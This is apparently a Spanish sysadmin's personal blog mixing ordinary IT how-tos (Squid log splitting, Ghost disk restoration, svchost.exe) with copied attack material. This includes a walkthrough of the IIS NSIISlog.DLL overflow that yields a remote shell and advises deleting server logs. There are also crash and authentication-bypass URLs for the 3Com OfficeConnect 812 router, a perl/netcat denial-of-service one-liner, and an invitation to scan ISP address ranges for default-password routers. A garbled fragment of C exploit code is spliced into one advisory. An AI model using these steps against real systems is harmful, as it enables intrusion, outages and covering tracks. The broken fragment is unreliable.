• Administro la red informática de una empresa con Windows
  • Soy wembaster de más de 20 páginas web
  • Hago una tesis doctoral en ingeniería con Linux
  • Estudié Física e Ingeniería
  • Me gusta la seguridad informática y hacer de hacker

Dividir logs access y store del squid para poder leerlos

PROBLEMA
No consigo ver los logs que genera el Squid ni el Free Proxy.

CAUSA
Los archivos son demasiado grandes.

SOLUCIÓN
Dividirlos en archivos más pequeños.

DESARROLLO
El proxy squid genera unos logs (archivos donde se guarda la información de las páginas visitadas). Están en c:\squid\var\logs. Y sus nombres son:
access
store
cache
Los dos primeros son demasiado grandes (más d 150 MB) y no los puedo leer.
Son archivos txt (access.txt y store.txt) y no puedo leerlos.
No se pueden leer ni con el bloc de notas, ni con word pad, ni con word. Todos estos programas se bloquean al intentar abrirlos (aparece un mensaje de "no responde").

Para dividirlos en archivos más pequeños tenemos el KFK (se encuentra rápido en google buscando: "kfk download").

Este programa permite dividir el archivo en un número de partes iguales, o en partes de un determinado tamaño.

El programa no permite abrir los archivos de logs porque están en uso (puede aparecer el típico error "el archivo está siendo usado por otra aplicación"). Para evitar esto hacemos una copia de los archivos access y store (podemos llamarla access2 y store2).
Ahora sí que nos deja trabajar con las copias.

Si los archivos txt son de 20 MB los abre el txt, pero con dificultades. Yo los hago de 15 MB,para que los abra con más facilidad.

Para los usuarios de linux hay otra forma de dividir los archivos:
Si quisiésemos dividir en dos partes un archivo de 100 líneas haríamos:
head -n 40 archivo.txt > uno.txt
y después:
tail -n 60 archivo.txt > dos.txt

Conectar discos duros (HD) y cargar imagen de Ghost

Conectar discos duros (HD) y cargar imagen de Ghost

PROBLEMA

Un disco duro de la empresa falla y no arranca tras muchos intentos.

CAUSA
Desconocida.

SOLUCIÓN
Hacer una imagen con Norton Ghost de otro disco duro igual, formatear el HD que da problemas y cargarle la imagen de Ghost.

DESARROLLO
1.- Hacer una imagen con Norton Ghost del disco duro que funciona (hay una demo gratis de 30 días de Norton Ghost 10, que es suficiente para nuestro propósito).

2.- Se abre la CPU del ordenador que falla: desatornillar y sacar la tapa.

3.- Sacar el disco duro que falla: quitar los tornillos, los cables que le llegan por detrás y sacarlo.

4.- Conectarlo con el disco duro del que hemos hecho la imagen.
Esto no es tan sencillo la primera vez: luego es como comer pipas. Explicaré cómo se hace:
De la placa base (la placa verde más grande que hay en el ordenador) salen uno o dos cables ide.
Los cables ide son unos cables normalmente grises compuestos por muchos cables pequeños paralelos (los forman 40 u 80 cables paralelos: los de 80 van más rápido). El aspecto global de un cable ide es como una cinta aplanada de unos 4 o 5 cm. Esta cinta está formada por muchos cables pequeños.
Los cables ide tienen dos conectores en los extremos (máster) y otro a la mitad (escalvo).
En la placa base hay dos salidas para cables ide: el primario y el secundario (lo pone en las placas). Hay que colocar el cable ide en el primario de la placa base por un extremo (máster). El otro extremo máster del cable ide va al disco duro desde el que queremos arrancar el sistema (el HD del que hemos hecho la imagen de ghost).
Y el conector esclavo del cable ide (el que está a la mitad del cable), se conecta al hd que no va bien.
Cuando se conecta un cable ide hay que tener en cuenta su posición: el lateral con una línea roja ha de ir hacia el interior, para que esté junto al cable rojo de los que llegan de la fuente de alimentación (de la fuente de alimientación salen unos cables de colores que también hay que conectarlos al disco duro).
Otra historia son los leds, que son unos palitos metálicos muy pequeños, que hay en el hd. Están en un rectángulo, en dos filas de cinco, y tienen unos conectores que conectan dos leds entre sí. En cada hd hay un esquema explicativo de cómo conectar los leds. Se colocan como master o esclavo, según qué disco estemos conectando.

Esto que os he contado es la teoría, luego hay que probar hasta que funciona (tampoco hay tantas combinaciones posibles)

Por ejemplo, en el caso de mi empresa los equipos estaban así:
- hd original (del que hice la imagen): en esclavo respecto del ide. Y con los leds en esclavo. Lo dejo como está.
- CD Rom: en máster (para poder arrancar desde el cd). Aquí es donde conecto el hd en el que cargaré la imagen con los leds colocados como esclavo (sin conectores entre ellos).
Es decir, para "manejar" un hd en mi empresa sólo hay que sacarlo de su sitio, dejar los leds sin conexiones (como esclavo) y conectarlo en el lugar del CD de otro equipo. Es como tener un pen-drive de 30 GB (aunque es algo más complicado de manejar).

5.- Arrancar el ordenador

6.- Formatear el hd que no funcionaba.
Formateo NO rápido como NTFS (es mejor que como FAT-32).
Para que luego funcione correctamente como disco de arranque hay que marcarlo como disco de arranque activo. Esto se hace en: Inicio > Panel de control >Herramientas administrativas > Administración de equipos.
También hay que ponerlo como partición nueva primaria.

7.- Cargar la imagen de ghost en el disco recién formateado.

8.- Quitar el disco recién generado y llevarlo al ordenador de donde procedía.

9.- Cambios finales.
Para que funcione correctamente hay que cambiarle la ip (tiene la del ordenador del que ha recibido la imagen). Seguramente nos avise de esto win xp al arrancar: dirá algo así como "hay un conflicto de ip con otro equipo de la red". Sólo se puede dar al botón aceptar en ese caso (no hay muchas opciones).
Cambiarle de nombre de equipo (tiene el del ordenador del que ha recibido la imagen): Inicio > botón derecho sobre Mi Pc > Propiedades > Nombre de Equipo > Cambiar
Darle de alta en la red: Inicio > botón derecho sobre Mi Pc > Propiedades > Nombre de Equipo > Id. de red

Con esto ya tenemos el ordenador funcionando (si no ha habido contratiempos).

Recomiendo vivamente tener una imagen de ghost de cada uno de los equipos de la empresa, por si se da una situaicón como esta. Sobre todo una imagen del servidor.

iis exploits: explotando el bug de buffer overflow remoto (NSIISlog.DLL)

iis exploits: explotando el bug de buffer overflow remoto (NSIISlog.DLL)

PROBLEMA

Escaneando con X-scan mi sistema descubrí que tiene esta vulnerabilidad en el iis y NSIISlog.DLL.

CAUSA
Nadie es perfecto, salvo Dios

SOLUCIÓN
Buscar cómo explotarla, para ver si es sencillo

DESARROLLO
No fue fácil encontrar una explicación buena de cómo explotar el bug de buffer overflow remoto (NSIISlog.DLL). Había alguna información sobre iis exploits, pero ninguna me convenció, hasta que encontré un artíuculo que copio a continuación.

Me di cuenta de que, si mi sistema sólo tiene este resquicio, no le merece la pena entrar a un hacker, porque hay sistemas más vulnerables que el mío.

Os copio el artículo:

Explotando el bug de buffer overflow remoto (NSIISlog.DLL)
Enviado el Sábado, 19 julio a las 01:19:55 por SeSoX

1.- Sistemas vulnerables
2.- Como saber si un sistema es vulnerable
3.- Creando un sistema vulnerable
4.- Consiguiendo acceso por telnet
5.- Echando un vistazo a los logs
6.- Agradecimientos y Despedida


1.- Sistemas vulnerables
^^^^^^^^^^^^^^^^^^^^

Tal y como podemos ver en la web de securityfocus[1], los sitemas vulnerables son:

Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server


2.- Como saber si un sistema es vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Para saber si un sistema es vulnerable lo que debemos hacer es un telnet a su puerto 80 y hacer una peticion al servidor, aqui os muestro la respuesta del servidor en caso de ser y no ser vulnerable:

NOTA: Se han eliminado los tags html para facilitar la publicacion del documento.

Siendo vulnerable responderia:

SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:23:46 GMT
Content-Type: text/html

NetShow ISAPI Log Dll
NetShow ISAPI Log Dll
Connection closed by foreign host.



NO siendo vulnerable responderia:

SeSoX ~# telnet 192.168.0.25 80
Trying 192.168.0.25...
Connected to 192.168.0.25.
Escape character is '^]'.
GET /scripts/nsiislog.dll HTTP/1.0

HTTP/1.1 500 Error del servidor
Server: Microsoft-IIS/5.0
Date: Fri, 18 Jul 2003 12:29:02 GMT
Content-Type: text/html
Content-Length: 105

Error
No se puede encontrar el módulo especificado.
Connection closed by foreign host.

En caso de no ser vulnerable tambien nos podria responder con otras cosas como por ejemplo:

Error
%1 no es una aplicación Win32 válida.
Connection closed by foreign host.

Pero esto ya os lo dejo a cada uno.



3.- Creando un sistema vulnerable
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Lo que tenemos que hacer para que un sistema w2k sea vulnerable es instalar el propio windows,
el IIS y tambien el windows media services. Si vamos a hacer una instalacion nueva de w2k debemos
tener en cuenta que el windows media services no lo podemos seleccionar para que se instale en
la propia instalacion de windows (en este caso el bug no funciona) debemos instalarlo despues
desde la opcion de agregar o quitar programas. De este modo, hacemos la instalacion de windows
con el IIS y una vez echo esto, instalamos windows media services desde agregar o quitar programas,
si nos fijamos esto nos creara un fichero (NSIISLOG.DLL) dentro de la carpeta scripts del
directorio del servidor web (IIS) y una vez comprobado esto, podemos usar el paso 2 para comprobar
que realmente somos vulnerables. En caso de que no os funcione, podeis probar a reiniciar el
servidor web desde panel de control -> servicios -> Servicio de publicacion en Wordl Wide Web.


4.- Consiguiendo acceso por telnet
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Bueno, una vez localizado un servidor vulnerable usando la tecnica explicada en el punto 2 debemos
usar el exploit[2] para poder conseguir una cuenta en el sistema, lo que debemos hacer es lo
siguiente:


C:>nsiislog 192.168.0.25

C:>telnet 192.168.0.25 7788

Microsoft Windows 2000 [Versi¢n 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:WINNTsystem32>

Ya tenemos acceso al sistema!!!!!!!!!!!! ahora deja volar tu imaginacion };)
Podemos usar tftp para subir ficheros al servidor y si somos un poco paranoicos
pasarnos por el directorio c:winntsystem32logfilesw3svc1 para borrar los logs.


5.- Echando un vistazo a los logs
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Revisando un poco los logs que deja este ataque, podemos ver algo como lo siguiente:

Fichero: C:WINNTsystem32LogFilesW3SVC1ex030718.log

2003-07-18 12:45:02 192.168.0.25 - 192.168.0.25 80 POST /scripts/nsiislog.dll - 500 -

En el caso del test para saber si el sistema es o no vulnerable el log seria:

2003-07-18 12:32:24 192.168.0.25 - 192.168.0.25 80 GET /scripts/nsiislog.dll - 500 -


5.- Agradecimientos y Despedida
^^^^^^^^^^^^^^^^^^^^^^^^^^^

Agradecer a ASzY la revicion de este documento, a toda la peña que me ha ayudado cuando lo
he necesitado y a toda la gente que escribe textos como este para enseñar cosillas a los demas.

Si os surge cualquier duda, encontrais algun fallo o quereis añadir algo en este texto, no dudeis
en escribirme a (sesox at govannom dot org) porque estare encantado de leer vuestros correos.

Que tengais una divertida y productiva caza!!!! ;)

[1] http://www.securityfocus.com/bid/8035
[2] http://www.govannom.org/seguridad/exploits/robesan/nsiislog.exe
http://www.govannom.org/seguridad/exploits/robesan/xfocus-nsiislog.c

Mas informacion:

http://www.terra.es/personal6/robesan/IIS_Media.pdf
http://www.derkeiler.com/Mailing-Lists/NT-Bugtraq/2003-07/0014.html
http://rynhozeros.com.ar/article478.html
http://www.vsantivirus.com/vulms03-022.htm
http://www.vsantivirus.com/vulms03-019.htm

Tambien podeis consultar este texto en la seccion de seguridad de www.govannom.org.

Vulnerabilidades del Router 3Com OfficeConnect 812 de Telefónica

Vulnerabilidades del Router 3Com OfficeConnect 812 de Telefónica

PROBLEMA

Tengo un router 3Com OfficeConnect 812 en mi casa. Quiero ver su seguridad... y me llevo una sorpresa: es un coladero.

CAUSA
Tiene unas cuantas vulnerabilidades y exploits.

SOLUCIÓN
Tirarlo. Aunque algunos dicen que se arregla con un software nuevo. El mío se rompió poco después y me lo cambiaron los de Telefónica por un Zyxel.

DESARROLLO

Investigando sobre la seguridad de mi router, me llevé unas cuantas sorpresas. Aquí os las cuento.

La primera de ellas es que el 3com no guarda registro de los intentos de ataque ni de las entradas.

Para los hackers y los spammers hay un ejercicio muy sencillo, que está al alcance de cualquier fortuna: escanear con nmap un buen número de ip's de telefónica. Ver cuáles tienen el 3 Com e intentar entrar. Es bastante sencillo, sobre todo si no han quitado la contraseña por defecto que viene de fábrica, que es de todos conocida.

A continuación os pongo algunos artículos interesantes sobre el tema, que me encontré investigando por la red (están separados por una línea de asteriscos):

Lo que aqui voy a relatar es un fallo de un router bastante conocido en España. El texto que en principio estaba escrito a lo bestia y recien descubierto el fallo, lo voy a intentar estirar un poco más y así poder explicarlo a la gente 'nueva' interesada en estos temas, a ver si lo españoles o por lo menos los maños ;-) le damos un poco de vida en castellano a esto de la investigación... o contrainvestigacion :-P. Lo que esta claro es que nada de esto lo comparto para joder a nadie, esta claro que me podria divertir mucho con todos estos señores malos que se desprotegen el router, le cambian la contraseña, le quitan los filtros y se dedican a escanear dominios en busca de probar lo que en tal o cual ¿"tutorial"? le enseñan a hacer (si, lo cierto es que el 'net' da mucho juego con estos señores ;). Bueno, el caso, este texto lo difundo porque no me creo que 3COM(p) o Allegro lo desconocieran (y sin embargo no han dicho nada), tambien me parece curioso que Telefonic(a) tubiera hasta hace poco especial interes en instalar un router con un software especialmente antiguo para el 2000-2001 (el Allegro-Software-Rompager 2.10), ¿muchas unidades a bajo precio? por caracteristicas y marca el 3COM deberia ser al menos el doble de caro que el SpeedStream.... bueno........, y aparte de todo esto, no se, de alguna manera hay que agradecer a todo el mundo del que has aprendido cosas el haberlas aprendido, y eso no se hace callandote las que descubres. ¿La pena? No volver a poder joder al cabron del tipo que sestaba intentando meter en mi FTP (bufffff..... mencantan los nombres chungos, FXP'ers o algo asi? XDDDDDDDDDDDDDDDDDDD). Bueno, el caso es que aqui teneis un fallo de la vida real, que lo podeis probar en casa, os puede dar pie a investigar otras cosas, y eso seria cojonudo. Adelante :-P

• OVERVIEW


ROUTER: 3COM OfficeConnect 812 (el blanco con hub de 4 puestos de la Timofonica :P)
Fallo en el servidor de HTTP (puerto 80 TCP). - Allegro-Software-Rompager v.2.10

• HARDWARE


Seguro que se utilizara varios routers más, o automatas u otros aparatos puesto que la marca no se dedica a la construccion de servidores gansos ni nada asi sino a los aparatejos configurables via HTTP. Bueno, lo mejor es que mireis la pagina del fabricante del software (no del firmware, sino de la parte que actua de servidor de web).

http://www.allegrosoft.com

• PROBLEMA


Bien, el problema es parte de 3COM y parte de los autores del servidor. ¿Porque digo esto?. Intentar buscar una parte desprotegida en el SpeedStream. Quiero decir, intentar buscar un GIF, un HTM, un archivo que sepais que esta ahí, pero..... upsssssss.... os pide password. Bien buscar uno que no os la pida. No, ¿verdad?. ¿Os habeis fijado lo que pone cuando metes mal la password?. Una simple y llama linea ni siquiera siguiendo el HTTP, texto puro, que pone no se que historias de que mala autentificacion (no tengo el router a mano ahora). Bien, el 3COM comete un fallo. Intentar meteros....... os pide password, y la fallais... cojonudo, os sale una preciosa pagina web que pone que ese objeto esta protegido.... bien, echemos un vistazo a su html:


// Ya de primeras me parece chungo lo de una NMI en un router......
bueno...... pasando.....


// Primera cosa graciosa........ tenemos acceso al archivo sml3com... bueno, de hecho tenemos acceso a todo el /graphics entero, aunque no estemos autentificados. (esto es fallo por supuesto de 3COM).


// A /Images tambien tenemos acceso

¿Que quiere decir todo esto? Que se nos han dejado ficheros con acceso con los cuales quiza podamos hacer algo.
Lo primero que se me ocurre es probar a ver a que más tenemos acceso a simple vista........ /Images, /graphics....

Bueno, ni en graphics ni en Images encuentro nada a la primera. Joder... miro el primer GIF, el sml3com XDDDDDDDDDDDDD.......... bueno, para buen inri tiene 666 bytes XDDDDDDDDDDDDDD joder, se merece una intentona, no? XDDDDDDDDDDDDDDDD probemoslo.

http://192.168.1.254/graphics/sml3com
Justo,.... aparece el GIF en pantalla

Sigamos probando...
http://192.168.1.254/graphics/sml3com%ñ
The requested URL '/graphics/sml3com%%C3%B1' was not found on the OfficeConnect server
Algo sacaremos de ahi algun dia con menos petas encima XDDDDDDDDDDDDDDDD

http://192.168.1.254/graphics/../../../000000000000000000000000000000000000000000000000000000000000000000
El router no muestra nada, pasa de nosotros. Bueno, es lo mejor que puede hacer XDDDDDDDDDDD

Ale pues con las tipicas "s"
http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s

Uhm...... se lo piensa....... parece que lo de siempre................ coñoooooooo.............. el router ha petao :-)... luces rojas....... luces de todos colores....... router a tomar por saco......... Curioso, solo lo hace cuando tiene un archivo con acceso delante. Vamos... la culpa de la imprudencia es de 3COM por el diseño de la web interna del bicho, y la culpa del bug esta claro que de los de allegro.... sigamos....

http://192.168.1.254/images/../filterSummary%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S
%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S
%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S%S

Esta claro..... con cualquier peticion de algo que exista con un cadenon detras, el bicho peta...

1 hora mas tarde.......... continué viendo los nombres de los archivos en mi router con mi clave y probandolos en el FXPero (lo siento, pero a estas horas de la noche ya tengo la cabeza echa polvo XDDDDDDDD)

Encontramos otro fallo de seguridad.......... joder esta gente son la leche....... no necesitamos password para entrar aqui :-)
http://192.168.1.254/adsl_pair_select
Warning! Changing the pair setting resets the line. When the line resets all currently active remote site connections are dropped.
// Tiene cojones, ademas nos avisa ;-)

Y por ultimo ya, antes de echarme a sopar.......... me encuentro con esto.........
http://192.168.1.254/adsl_reset

Resetting the ADSL line causes the modem to renegotiate the ADSL level connection.
Warning! If you reset the line all currently active remote site connections will be dropped.

// Sin comentarios ;-)


• EXPLOITS


http://192.168.1.254/adsl_reset
http://192.168.1.254/adsl_pair_select
http://192.168.1.254/graphics/sml3com%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s

• RESOLUCION DEL PROBLEMA


Que yo sepa no se le puede actualizar el soft de HTTP, el RomPager, asi que a joderse y a poner filtros que para algo están ;-). Aquel que necesite
configurar el router remotamente, y desde IP's diferentes........ pues puede poner un filtro que no deje pasar ninguna IP de ningun sitio remoto hacia el puerto 80, y añadir un puerto en la NAPT, que no se escanee facilmente, por ejemplo cualquier del 10000 al 65535, y reconfigurao para que todo lo que entre en el 10000 de TCP por ejemplo, lo tenga que rutar al 127.0.0.1 (loopback) al 80... o a la IP local que tenga el router, al 80. El que solo lo vaya a configurar desde su ordenador, que ponga filtros al 80 y punto. Como consejillo........ preveo algun fallo en el escuchador del RIP, asi que de consejillo os dejo que pongais un filtro que no deje pasar ninguna IP (ojo, ni por TCP ni por UDP)..... y tras eso ya veremos si al RIP le afecta eso ;))

Siento no extenderme más pero....... tengo que acabar una web..........
talego! :P

Like always... Not Copyrighted by UnMateria'01
Contacto: ix_lsd@hotmail.com (no me como a nadie, pero tampoco respondo a todo el mundo ;)

Cualquier duda, a los foros.
Creado por UnMateria para http://www.bandaancha.st

*****************************************************************


Date: Thu, 27 May 2004 12:37:51 -0400
From: idlabs-advisories@idefense.com
Subject: iDEFENSE Security Advisory 05.27.04: 3Com OfficeConnect Remote 812





3Com OfficeConnect Remote 812 ADSL Router Authentication Bypass
Vulnerability

iDEFENSE Security Advisory 05.27.04
www.idefense.com/application/poi/display?id=106&type=vulnerabilities
May 27, 2004

I. BACKGROUND

The 3Com OfficeConnect Remote 812 ADSL Router is a standalone
bridge/router, with interfaces to a Local Area Network and an ADSL
interface to a Wide Area Network.

II. DESCRIPTION

Remote exploitation of an authentication bypass vulnerability in 3Com's
OfficeConnect Remote 812 ADSL Router could allow remote users to
arbitrarily manipulate network traffic.

By making multiple successive authorization attempts to connect to the
router, it is eventually possible to authenticate with any
username/password combination. While the root cause of the vulnerability
is not known, exploitation is trivial and does not require either a
known username or password.

III. ANALYSIS

Successful exploitation allows an attacker to perform any administrative
function that a legitimate administrator could perform.

More information about the 3Com OfficeConnect Remote 812 ADSL Router is
available at
http://www.3com.com/products/en_US/detail.jsp?tab=support&pathtype=suppo
rt&sku=3CP4144.

IV. DETECTION

iDEFENSE has confirmed that the 3Com OfficeConnect Remote 812 ADSL
Router with the last firmware patch is vulnerable

V. WORKAROUNDS

A previously given workaround for other issues with the HTTP interface
is available at the link shown. This shows how to configure the router
to prevent external access to the HTTP port.

http://support.3com.com/infodeli/tools/remote/ocradsl/http_filtering.pdf

VI. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CAN-2004-0477 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org), which standardizes names for
security problems.

VII. DISCLOSURE TIMELINE

02/18/04 Exploit acquired by iDEFENSE
03/08/04 iDEFENSE Clients notified
03/11/04 Initial vendor notification - no response
03/30/04 Secondary vendor notification - no response
05/27/04 Public Disclosure

VIII. CREDIT

Rafel Ivgi is credited with this discovery.

Get paid for vulnerability research
http://www.idefense.com/poi/teams/vcp.jsp

IX. LEGAL NOTICES

Copyright (c) 2004 iDEFENSE, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDEFENSE. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically, please
email customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on,
this information.



***********************************************************

(Exploit Code is Available) 3Com OfficeConnect DSL Router Can Be Crashed With Long URL

SecurityTracker Alert ID: 1009206
CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)
Date: Feb 25 2004

Impact: Denial of service via network

Exploit Included: Yes

Version(s): Firmware 1.1.9; Model 812

Description: A denial of service vulnerability was reported in the 3Com OfficeConnect DSL router (model 812). A remote user can cause the router to crash.

David Madrid reported that authentication is not required on the web-based administration interface, allowing a remote user on the LAN interface to trigger a buffer overflow by sending a specially crafted URL to the device to cause the device to crash and reboot.

A demonstration exploit command is provided:

perl -e 'print "A"x512;print "\n\n\n\n\n\n\n\n"' | netcat -v -n 192.168.0.1 80

If the web-administration interface has been enabled on the WAN interface, then a remote user on the Internet can trigger the flaw, according to the report.

Shaun Colley has submitted some demonstration exploit code, available in the Source Message [it is Base64 encoded].

Impact: A remote user can cause the device to crash and reboot.

Solution: No solution was available at the time of this entry. stdout);
SEND(JOIN);
if(timeout(sd) < buff =" malloc(BUFFSZ);" tv_sec =" TIMEOUT;" tv_usec =" 0;" err =" select(sock" host_ip =" inet_addr(host);" host_ip ="="" hp =" gethostbyname(host);" host_ip =" *(u_long">h_addr;
}
return(host_ip);
}



#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif

Vendor URL: www.3com.com/ (Links to External Site)

Cause: Boundary error

Reported By: http://securitytracker.com/archives/idreportedby/1938.html

Message History: This archive entry is a follow-up to the message listed below.

************************************************

Existe un problema en el PAT de los routers 3Com OfficeConnect Remote 812 ADSL Router que puede utilizarse para acceder a todos los puertos de la máquina que haya detrás del router.

Cuando intentamos conectar a un puerto que no está redirigido a la máquina que haya detrás del router, usando PAT no hay problema, simplemente el router no permite dicha conexión. Pero si conectamos a un puerto que esté redirigido mediante PAT, e inmediatamente tratamos de conectar a cualquier otro puerto no redirigido por PAT, el router permite las conexiones sucesivas a cualquier puerto. Dicho problema existe tanto en TCP como en UDP.

Página1/1

NAT es una funcionalidad que se encuentra en routers, firewalls, etc... que permite traducir direcciones, generalmente internas e inexistentes en internet, a direcciones públicas existentes.

Un cierto tipo de NAT es el PAT (Port Address Translation). PAT mapea conexiones internas a una dirección IP única de la red externa.

El fallo ha sido probado en las versiones v1.1.9 y v1.1.7 del OCR812.

La solución al fallo consiste en instalar un firewall en las máquinas que haya detras del router o esperar a una actualización del fabricante.

Más información:
- http://www.3com.com/
- http://online.securityfocus.com/archive/1/274239

SVCHOST.exe

El misterioso archivo SVCHOST.exe

PROBLEMA
El arranque de win es lento y el proceso svchost.exe acapara mucha memoria

CAUSA
Este proceso se emplea varias veces al incio del sistema.

SOLUCIÓN
Saber para qué sirve, para ver si se puede borrar.

DESARROLLO
Me ocurrió que este proceso ocupaba mucha memoria en uno de los equipos.
En un foro encontré esto:

Pregunta: "El problema es que desde hace un par de dias cuando inicio la maquina el proceso svchost.exe consume todos los recursor de la pc y la dej amuerta por un buen par de minutos."

Respuesta:"Prueba estas opciones:
Con el administrador de tareas, finaliza el svchost que te este molestando. Si no se te cuelga la maquina, era un proceso no necesario
Elimina la lista de inicio de aplicaciones, puede que estes con un troyano no detectable con tus antivirus/antispy"

Otra respuesta: "svchost.exe es un proceso del sistema, todos los windows lo tienen abierto y 4 o 5 veces muchas veces.

creo recordar que era para protocolos de comunicacion en la red, pero no estoy seguro"

Como véis no se sabe muy bien para qué sirve este proceso.
Yo he encontrado una explicación más detallada:


El archivo Svchost.exe se encuentra en la carpeta C:\WINDOWS\system32\svchost.exe en Windows XP y C:\WINNT\system32\svchost.exe en Windows 2000.

Al iniciarse, Svchost.exe comprueba la parte de servicios del Registro para elaborar la lista de servicios que necesita cargar. Se pueden ejecutar múltiples instancias de Svchost.exe al mismo tiempo. Cada sesión de Svchost.exe puede contener un conjunto de servicios, para que se puedan ejecutar servicios autónomos, en función de cómo y cuándo se inició Svchost.exe. Esto permite un control mejor y una depuración más sencilla.

Los grupos Svchost.exe están identificados en la siguiente clave del Registro:

HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\CurrentVersion\Svchost

Cada valor contenido en esta clave representa un grupo Svchost distinto y se muestra como un ejemplo independiente cuando se consultan los procesos activos.

Cada valor es un valor REG_MULTI_SZ que contiene los servicios que se ejecutan en el grupo Svchost. Cada grupo Svchost puede contener uno o varios nombres de servicio que se extraen de la siguiente clave del Registro, cuya clave Parámetros contiene un valor ServiceDLL:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ Nombre del Servicio

Por esta razon, suele aparecer varias veces en la lista de procesos en ejecucion.

Para ver la lista de servicios que se ejecutan en Svchost y los otros procesos:


Haga clic en el boton Inicio en la barra de tareas de Windows y, a continuación, en Ejecutar.
En el cuadro de diálogo Abrir, escriba CMD y, a continuación, presione la tecla Enter.
Ahora en la ventana de la consola de comandos, escriba:

Tasklist /SVC

... y a continuación, presione Enter.
Te aparecerá un listado de los procesos activos y los servicios del sistema asociados con dichos procesos "si los hay" (en caso contrario muestra N/D, no disponible).

Tasklist muestra una lista de los procesos activos. El modificador /SVC muestra la lista de servicios activos para cada proceso.

Si tienes Windows XP Professional y quieres obtener más informacion sobre los servicios que el proceso SVCHOST está ejecutando en estos momentos haz esto:


Haga clic en el boton Inicio en la barra de tareas de Windows y, a continuación, en Ejecutar.
En el cuadro de diálogo Abrir, escriba CMD y, a continuación, presione la tecla Enter.
Ahora en la ventana de la consola de comandos, escriba:

tasklist /svc /fi "imagename eq svchost.exe"

... y a continuación, presione Enter.
En este caso se mostrarán sólo los procesos SVCHOST.exe y sus servicios asociados.

Y la respuesta a la típica pregunta de si hay que cerrar o eliminar el proceso SVCHOST, NO! no hay que tocarlo, este programa es importante para estabilidad y seguridad de su sistema y no deberia ser terminado.

Uso de recursos del sistema

Uso de memoria:

SVCHOST.EXE puede llegar a ocupar hasta unos 60MB de la memoria de sistema.
SVCHOST.EXE puede aparecer listado en la lista de procesos muchas veces por cada servicio que éste tenga activos.

Uso de procesador:

El uso de procesador por parte de SVCHOST.EXE no debe ser mas de 20% en algunos casos, (en mi caso personal en este momento solo un 0%) éste uso de CPU no debe ser permanente, o sea no debe ocupar CPU en todo momento a menos que en tu sistema se esté ejecutando alguna aplicacion de red crítica que siginifique el uso de todos estos recursos en todo momento, si no es así, sospecha de que estas siendo atacado externamente por algun bicho que aprovecha la vulnerabilidad RPC. (más abajo)

SVCHOST, los puertos que abre y su configuracion con Firewalls

Como vimos anteriormente, SVCHOST.exe puede aparecer varias veces cargado en el sistema, de hecho, mientras escribo éste artículo, SVCHOST.exe aparece en la lista de procesos 6 veces, ocupando algo así como 45MB de memoria, este aparece cargando los servicios DcomLaunch, TermService, RpcSs,AudioSrv, Browser, CryptSvc, Dhcp, dmserver, ERSvc, EventSystem, FastUserSwitchingCompatibility, helpsvc, HidServ, lanmanserver, lanmanworkstation, Netman, Nla, rasAuto, RasMan, Schedule, seclogon, SENS, SharedAccess, ShellHWDetection, Tapisrvc, Themes, trkWks, winmgmt, wscsvc, wuauserv, WZCSVC, LmHosts, SSDPSRV, upnphost, WebClient, stisvc y HTTPFilter, pero, como si fuera poco, si tienes un Firewall, y alguna vez has visto listados los puertos que el proceso SVCHOST.exe tiene para sí, encontraras que SVCHOST.exe es el responsable de tener abiertos varios puertos del sistema.


"SVCHOST.exe no solo es el responsable de cargar varios servicios,
tambien abre numerosos puertos de conexion a nuestro sistema."


En mi caso, SVCHOST.exe tiene abiertos los siguientes puertos:

Con protocolo TCP: 135 y 2869

Con protocolo UDP: 53, 1035, 1036, 1900, 2030 y 3031

